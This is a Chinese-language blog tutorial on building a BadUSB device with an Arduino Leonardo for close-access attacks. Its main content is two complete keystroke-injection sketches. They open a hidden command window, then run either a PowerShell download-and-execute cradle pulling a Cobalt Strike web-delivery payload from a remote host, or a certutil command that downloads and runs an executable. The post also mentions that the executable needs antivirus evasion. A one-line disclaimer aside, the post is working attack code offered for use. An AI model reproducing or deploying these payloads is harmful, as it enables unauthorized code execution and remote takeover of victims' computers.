[近源攻击]badusb制作
免责声明:本文用于攻击者攻击方式,用于提高防范意识,切勿用于不法用途
前言
欢迎来到我的博客
个人主页:北岭敲键盘的荒漠猫-CSDN博客
本文整理近源攻击制作攻击USB的相关思路
硬件支持
首先你得有跟up一样帅的可编程USB
安装编写工具
https://www.arduino.cc/en/software
然后安装好
插USB
先插上USB
然后在工具中选择相应型号的开发板
选择要开发的硬件板
这里的型号要看你买的USB是什么类型的。
我的是上面那个leonardo的。
然后选中这个USB
这里的名字可以在计算机管理页面端口位置查看
你插上多出来哪个就是哪个。
web投提式入侵
CS生成web投递
复制一下网址
然后把下面代码写到里面去
#include<Keyboard.h>void setup() {Keyboard.begin();delay(3000);//延时Keyboard.press(KEY_LEFT_GUI);delay(200); Keyboard.print("r");delay(200); Keyboard.release(KEY_LEFT_GUI);Keyboard.press(KEY_CAPS_LOCK);Keyboard.release(KEY_CAPS_LOCK);Keyboard.println("CMD /t:01 /k @ECHO OFF && MODE CON:cols=15 lines=1"); //使用最小化隐藏cmd窗口delay(200); //=========================Run==========================Keyboard.println("cmd");delay(500);Keyboard.println("powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.9:6666/XD'))");delay(5000);//======================================================Keyboard.press(KEY_CAPS_LOCK);Keyboard.release(KEY_CAPS_LOCK);Keyboard.end();//结束键盘通讯
}void loop()
{
}
powershell哪里自行修改为自己的,去除双引号
然后点击
即可上线
木马下载式入侵
代码如下
#include<Keyboard.h>void setup() {Keyboard.begin();delay(3000);//延时Keyboard.press(KEY_LEFT_GUI);delay(200); Keyboard.print("r");delay(200); Keyboard.release(KEY_LEFT_GUI);Keyboard.press(KEY_CAPS_LOCK);Keyboard.release(KEY_CAPS_LOCK);Keyboard.println("CMD /t:01 /k @ECHO OFF && MODE CON:cols=15 lines=1"); //使用最小化隐藏cmd窗口delay(200); //=========================Run==========================Keyboard.println("cmd");delay(500);Keyboard.println("certutil -urlcache -split -f http://192.168.1.4:85/1.exe c:\\temp\\1.EXE");Keyboard.println("cd c:\\temp\\");Keyboard.println("1.exe");delay(500);Keyboard.println("exit");//======================================================Keyboard.press(KEY_CAPS_LOCK);Keyboard.release(KEY_CAPS_LOCK);Keyboard.end();//结束键盘通讯
}void loop()
{
}
到时候给文件托管,让他下载到指定位置即可。
这种需要文件免杀。
上限高。
注意事项
1.开着vware虚拟机不太行,测试了一下他会提示你连接到虚拟机还是主机,你选择慢了他会提示端口占用
2.后面那个网址你代码中写的DE那么他访问的是de,反之相反。不知道是不是bug
3.每次编译完他都会自行执行一次的